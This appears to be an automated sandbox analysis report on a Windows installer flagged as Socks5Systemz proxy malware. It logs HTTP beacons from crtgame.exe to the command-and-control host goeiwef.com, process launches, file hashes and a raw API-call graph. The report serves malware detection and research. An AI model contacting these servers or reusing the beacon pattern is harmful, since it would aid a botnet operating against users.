Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 20:08:48.766771078 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1
Host: goeiwef.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 20:08:50.004769087 CET | 878 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 19:08:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
                                                                                          Dec 14, 2024 20:08:53.394088030 CET  303  OUT  GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:53.823422909 CET  220  IN  HTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:53 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session ID:4
                                                                                          Source IP:192.168.2.5
                                                                                          Source Port:49920
                                                                                          Destination IP:185.237.206.129
                                                                                          Destination Port:80
                                                                                          PID:5884
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Dec 14, 2024 20:08:54.064778090 CET  303  OUT  GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:55.343018055 CET  740  IN  HTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:55 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 32 31 34 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 66 30 65 35 35 38 32 34 65 30 65 64 39 65 37 61 36 39 32 62 65 61 35 32 63 63 31 36 34 36 61 37 64 35 62 63 66 64 36 35 61 64 63 34 65 34 33 64 32 34 65 39 34 35 39 66 36 34 61 65 39 62 30 65 38 34 66 39 61 35 33 39 64 33 38 30 31 39 33 32 65 38 38 35 30 39 64 38 32 33 65 32 34 37 32 34 32 61 36 32 34 33 65 37 30 63 37 39 65 36 64 32 63 38 38 38 39 64 62 33 65 35 64 35 61 39 31 64 61 30 32 66 38 30 66 63 63 64 62 35 65 61 64 32 35 33 66 31 35 35 37 63 62 35 63 32 31 64 30 35 65 66 61 33 34 39 64 34 34 34 34 62 30 32 39 65 62 62 62 31 62 39 36 35 66 35 32 61 33 62 37 61 33 38 39 66 63 64 66 61 36 34 62 65 32 66 62 62 35 38 36 64 65 32 30 33 38 39 63 31 34 62 39 33 35 65 34 37 35 31 39 61 30 62 39 37 35 61 39 30 62 63 31 62 35 37 62 39 64 30 61 61 62 63 64 38 63 33 39 34 64 39 36 62 64 64 31 32 63 39 37 65 35 38 34 65 32 30 35 66 63 34 33 63 30 35 32 32 63 63 35 33 34 61 63 39 32 32 [TRUNCATED]
                                                                                          Data Ascii: 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


                                                                                          Session ID:5
                                                                                          Source IP:192.168.2.5
                                                                                          Source Port:49923
                                                                                          Destination IP:185.237.206.129
                                                                                          Destination Port:80
                                                                                          PID:5884
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Dec 14, 2024 20:08:55.687473059 CET  303  OUT  GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:56.958513021 CET  220  IN  HTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session ID:6
                                                                                          Source IP:192.168.2.5
                                                                                          Source Port:49929
                                                                                          Destination IP:185.237.206.129
                                                                                          Destination Port:80
                                                                                          PID:5884
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Dec 14, 2024 20:08:57.189357996 CET  303  OUT  GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:58.465342999 CET  220  IN  HTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session ID:7
                                                                                          Source IP:192.168.2.5
                                                                                          Source Port:49934
                                                                                          Destination IP:185.237.206.129
                                                                                          Destination Port:80
                                                                                          PID:5884
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Dec 14, 2024 20:08:58.701899052 CET  303  OUT  GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:59.978528023 CET  220  IN  HTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session ID:8
                                                                                          Source IP:192.168.2.5
                                                                                          Source Port:49936
                                                                                          Destination IP:185.237.206.129
                                                                                          Destination Port:80
                                                                                          PID:5884
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Dec 14, 2024 20:09:00.218385935 CET  303  OUT  GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:09:01.493968964 CET  220  IN  HTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:09:01 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session ID:9
                                                                                          Source IP:192.168.2.5
                                                                                          Source Port:49942
                                                                                          Destination IP:185.237.206.129
                                                                                          Destination Port:80
                                                                                          PID:5884
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Dec 14, 2024 20:09:01.739433050 CET  303  OUT  GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:09:03.069195032 CET  220  IN  HTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:09:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session ID:10
                                                                                          Source IP:192.168.2.5
                                                                                          Source Port:49947
                                                                                          Destination IP:185.237.206.129
                                                                                          Destination Port:80
                                                                                          PID:5884
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Dec 14, 2024 20:09:03.315077066 CET  303  OUT  GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:09:04.592535973 CET  220  IN  HTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:09:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session ID:11
                                                                                          Source IP:192.168.2.5
                                                                                          Source Port:49953
                                                                                          Destination IP:185.237.206.129
                                                                                          Destination Port:80
                                                                                          PID:5884
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Dec 14, 2024 20:09:04.832398891 CET  303  OUT  GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:09:06.108906984 CET  220  IN  HTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:09:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session ID:12
                                                                                          Source IP:192.168.2.5
                                                                                          Source Port:49955
                                                                                          Destination IP:185.237.206.129
                                                                                          Destination Port:80
                                                                                          PID:5884
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Dec 14, 2024 20:09:06.351213932 CET  303  OUT  GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:09:07.633358002 CET  220  IN  HTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:09:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Target ID:0
                                                                                          Start time:14:07:00
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Users\user\Desktop\KRdh0OaXqH.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\KRdh0OaXqH.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:7'246'011 bytes
                                                                                          MD5 hash:61AB9F06B48B8DF40CE15CE9252C0531
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:1
                                                                                          Start time:14:07:00
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp" /SL5="$10440,6991381,54272,C:\Users\user\Desktop\KRdh0OaXqH.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:704'000 bytes
                                                                                          MD5 hash:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:3
                                                                                          Start time:14:07:03
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /Query
                                                                                          Imagebase:0xbe0000
                                                                                          File size:187'904 bytes
                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:14:07:03
                                                                                          Start date:14/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 14:07:03
Start date: 14/12/2024
Path: C:\Program Files (x86)\CRTGame\crtgame.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
Imagebase: 0x400000
File size: 2'199'540 bytes
MD5 hash: BB0124F16D88C4EC1FCFD9E524A5B921
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 14:07:04
Start date: 14/12/2024
Path: C:\Windows\SysWOW64\net.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\net.exe" helpmsg 10
Imagebase: 0xb40000
File size: 47'104 bytes
MD5 hash: 31890A7DE89936F922D44D677F681A7F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 14:07:04
Start date: 14/12/2024
Path: C:\Program Files (x86)\CRTGame\crtgame.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
Imagebase: 0x400000
File size: 2'199'540 bytes
MD5 hash: BB0124F16D88C4EC1FCFD9E524A5B921
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3291926333.0000000000A25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: false

Target ID: 8
Start time: 14:07:04
Start date: 14/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 14:07:04
Start date: 14/12/2024
Path: C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\net1 helpmsg 10
Imagebase: 0x4f0000
File size: 139'776 bytes
MD5 hash: 2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 21.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.4%
Total number of Nodes: 1498
Total number of Limit Nodes: 22
execution_graph: raw node and edge dump of the interactive execution graph (function addresses and API-call labels rendered by the report viewer); not reproduced here.
407008 SetErrorMode 6078->6079 6355 403018 6356 403070 6355->6356 6357 403025 6355->6357 6358 40302a RtlUnwind 6357->6358 6359 40304e 6358->6359 6361 402f78 6359->6361 6362 402be8 6359->6362 6363 402bf1 RaiseException 6362->6363 6364 402c04 6362->6364 6363->6364 6364->6356 6772 409918 6773 409927 6772->6773 6774 40993a 6772->6774 6773->6774 6775 409956 CallWindowProcA 6773->6775 6775->6774 6369 40901e 6370 409010 6369->6370 6371 408fac Wow64RevertWow64FsRedirection 6370->6371 6372 409018 6371->6372 6373 409020 SetLastError 6374 409029 6373->6374 6385 403a28 ReadFile 6386 403a46 6385->6386 6387 403a49 GetLastError 6385->6387 6216 40762c ReadFile 6217 407663 6216->6217 6218 40764c 6216->6218 6219 407652 GetLastError 6218->6219 6220 40765c 6218->6220 6219->6217 6219->6220 6221 40748c 21 API calls 6220->6221 6221->6217 6392 40a02c 6393 409aa0 4 API calls 6392->6393 6394 40a031 6393->6394 6395 40a036 6394->6395 6396 402f24 5 API calls 6394->6396 6397 407918 InterlockedExchange 6395->6397 6396->6395 6398 40a060 6397->6398 6399 40a070 6398->6399 6400 409aa0 4 API calls 6398->6400 6401 4076ac 22 API calls 6399->6401 6400->6399 6402 40a08c 6401->6402 6403 4025ac 4 API calls 6402->6403 6404 40a0c3 6403->6404 6776 40712e 6777 407118 6776->6777 6778 403198 4 API calls 6777->6778 6779 407120 6778->6779 6780 403198 4 API calls 6779->6780 6781 407128 6780->6781 6782 408f30 6785 408dfc 6782->6785 6786 408e05 6785->6786 6787 403198 4 API calls 6786->6787 6788 408e13 6786->6788 6787->6786 6789 403932 6790 403924 6789->6790 6793 40374c 6790->6793 6792 40392c 6794 403766 6793->6794 6795 403759 6793->6795 6794->6792 6795->6794 6796 403779 VariantClear 6795->6796 6796->6792 6027 4075c4 SetFilePointer 6028 4075f7 6027->6028 6029 4075e7 GetLastError 6027->6029 6029->6028 6030 4075f0 6029->6030 6031 40748c 21 API calls 6030->6031 6031->6028 6405 405ac4 6406 405acc 6405->6406 6410 405ad4 6405->6410 6407 405ad2 6406->6407 6408 405adb 6406->6408 6412 405a3c 6407->6412 6409 405930 5 API calls 
6408->6409 6409->6410 6418 405a44 6412->6418 6413 405a5e 6415 405a63 6413->6415 6416 405a7a 6413->6416 6414 403154 4 API calls 6414->6418 6419 405930 5 API calls 6415->6419 6417 403154 4 API calls 6416->6417 6421 405a7f 6417->6421 6418->6413 6418->6414 6420 405a76 6419->6420 6423 403154 4 API calls 6420->6423 6422 4059a0 19 API calls 6421->6422 6422->6420 6424 405aa8 6423->6424 6425 403154 4 API calls 6424->6425 6426 405ab6 6425->6426 6426->6410 6427 4076c8 WriteFile 6428 4076e8 6427->6428 6429 4076ef 6427->6429 6430 40748c 21 API calls 6428->6430 6431 407700 6429->6431 6432 4073ec 20 API calls 6429->6432 6430->6429 6432->6431 6433 40a2ca 6442 4096fc 6433->6442 6436 402f24 5 API calls 6437 40a2d4 6436->6437 6438 403198 4 API calls 6437->6438 6439 40a2f3 6438->6439 6440 403198 4 API calls 6439->6440 6441 40a2fb 6440->6441 6451 40569c 6442->6451 6444 409745 6448 403198 4 API calls 6444->6448 6445 409717 6445->6444 6457 40720c 6445->6457 6447 409735 6450 40973d MessageBoxA 6447->6450 6449 40975a 6448->6449 6449->6436 6450->6444 6452 403154 4 API calls 6451->6452 6454 4056a1 6452->6454 6453 4056b9 6453->6445 6454->6453 6455 403154 4 API calls 6454->6455 6456 4056af 6455->6456 6456->6445 6458 40569c 4 API calls 6457->6458 6459 40721b 6458->6459 6460 407221 6459->6460 6461 40722f 6459->6461 6462 40322c 4 API calls 6460->6462 6463 40723f 6461->6463 6466 40724b 6461->6466 6465 40722d 6462->6465 6468 4071d0 6463->6468 6465->6447 6475 4032b8 6466->6475 6469 40322c 4 API calls 6468->6469 6470 4071df 6469->6470 6471 4071fc 6470->6471 6472 406950 CharPrevA 6470->6472 6471->6465 6473 4071eb 6472->6473 6473->6471 6474 4032fc 4 API calls 6473->6474 6474->6471 6476 403278 4 API calls 6475->6476 6477 4032c2 6476->6477 6477->6465 6478 402ccc 6479 402cdd 6478->6479 6483 402cfe 6478->6483 6480 402d88 RtlUnwind 6479->6480 6482 402b28 RaiseException 6479->6482 6479->6483 6481 403154 4 API calls 6480->6481 6481->6483 6484 402d7f 6482->6484 6484->6480 6805 403fcd 6806 403f07 4 API calls 
6805->6806 6807 403fd6 6806->6807 6808 403e9c 4 API calls 6807->6808 6809 403fe2 6808->6809 5463 4024d0 5464 4024e4 5463->5464 5465 4024f7 5463->5465 5502 401918 RtlInitializeCriticalSection 5464->5502 5467 402518 5465->5467 5468 40250e RtlEnterCriticalSection 5465->5468 5479 402300 5467->5479 5468->5467 5471 4024ed 5473 402525 5476 402581 5473->5476 5477 402577 RtlLeaveCriticalSection 5473->5477 5475 402531 5475->5473 5509 40215c 5475->5509 5477->5476 5480 402314 5479->5480 5481 402335 5480->5481 5482 4023b8 5480->5482 5484 402344 5481->5484 5523 401b74 5481->5523 5482->5484 5487 402455 5482->5487 5526 401d80 5482->5526 5534 401e84 5482->5534 5484->5473 5489 401fd4 5484->5489 5487->5484 5530 401d00 5487->5530 5490 401fe8 5489->5490 5491 401ffb 5489->5491 5492 401918 4 API calls 5490->5492 5493 402012 RtlEnterCriticalSection 5491->5493 5496 40201c 5491->5496 5494 401fed 5492->5494 5493->5496 5494->5491 5495 401ff1 5494->5495 5499 402052 5495->5499 5496->5499 5616 401ee0 5496->5616 5499->5475 5500 402147 5500->5475 5501 40213d RtlLeaveCriticalSection 5501->5500 5503 40193c RtlEnterCriticalSection 5502->5503 5504 401946 5502->5504 5503->5504 5505 401964 LocalAlloc 5504->5505 5506 40197e 5505->5506 5507 4019c3 RtlLeaveCriticalSection 5506->5507 5508 4019cd 5506->5508 5507->5508 5508->5465 5508->5471 5510 40217a 5509->5510 5511 402175 5509->5511 5512 4021ab RtlEnterCriticalSection 5510->5512 5515 4021b5 5510->5515 5519 40217e 5510->5519 5513 401918 4 API calls 5511->5513 5512->5515 5513->5510 5514 4021c1 5517 4022e3 RtlLeaveCriticalSection 5514->5517 5518 4022ed 5514->5518 5515->5514 5516 402244 5515->5516 5521 402270 5515->5521 5516->5519 5520 401d80 7 API calls 5516->5520 5517->5518 5518->5473 5519->5473 5520->5519 5521->5514 5522 401d00 7 API calls 5521->5522 5522->5514 5524 40215c 9 API calls 5523->5524 5525 401b95 5524->5525 5525->5484 5527 401d92 5526->5527 5528 401d89 5526->5528 5527->5482 5528->5527 5529 401b74 9 API calls 5528->5529 5529->5527 5531 401d1e 
5530->5531 5532 401d4e 5530->5532 5531->5484 5532->5531 5539 401c68 5532->5539 5594 401768 5534->5594 5536 401e99 5537 401ea6 5536->5537 5605 401dcc 5536->5605 5537->5482 5540 401c7a 5539->5540 5541 401c9d 5540->5541 5542 401caf 5540->5542 5552 40188c 5541->5552 5543 40188c 3 API calls 5542->5543 5545 401cad 5543->5545 5546 401cc5 5545->5546 5562 401b44 5545->5562 5546->5531 5548 401cd4 5549 401cee 5548->5549 5567 401b98 5548->5567 5572 4013a0 5549->5572 5553 4018b2 5552->5553 5561 40190b 5552->5561 5576 401658 5553->5576 5558 4018e6 5560 4013a0 LocalAlloc 5558->5560 5558->5561 5560->5561 5561->5545 5563 401b52 5562->5563 5564 401b61 5562->5564 5565 401d00 9 API calls 5563->5565 5564->5548 5566 401b5f 5565->5566 5566->5548 5568 401bab 5567->5568 5569 401b9d 5567->5569 5568->5549 5570 401b74 9 API calls 5569->5570 5571 401baa 5570->5571 5571->5549 5573 4013ab 5572->5573 5574 4012e4 LocalAlloc 5573->5574 5575 4013c6 5573->5575 5574->5575 5575->5546 5578 40168f 5576->5578 5577 4016cf 5580 40132c 5577->5580 5578->5577 5579 4016a9 VirtualFree 5578->5579 5579->5578 5581 401348 5580->5581 5588 4012e4 5581->5588 5584 40150c 5586 40153b 5584->5586 5585 401594 5585->5558 5586->5585 5587 401568 VirtualFree 5586->5587 5587->5586 5591 40128c 5588->5591 5592 401298 LocalAlloc 5591->5592 5593 4012aa 5591->5593 5592->5593 5593->5558 5593->5584 5595 401787 5594->5595 5596 40183b 5595->5596 5597 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5595->5597 5599 40132c LocalAlloc 5595->5599 5600 401821 5595->5600 5601 4017d6 5595->5601 5602 4017e7 5596->5602 5612 4015c4 5596->5612 5597->5595 5599->5595 5603 40150c VirtualFree 5600->5603 5604 40150c VirtualFree 5601->5604 5602->5536 5603->5602 5604->5602 5606 401d80 9 API calls 5605->5606 5607 401de0 5606->5607 5608 40132c LocalAlloc 5607->5608 5609 401df0 5608->5609 5610 401b44 9 API calls 5609->5610 5611 401df8 5609->5611 5610->5611 5611->5537 5613 40160a 5612->5613 5614 401626 VirtualAlloc 5613->5614 5615 40163a 5613->5615 
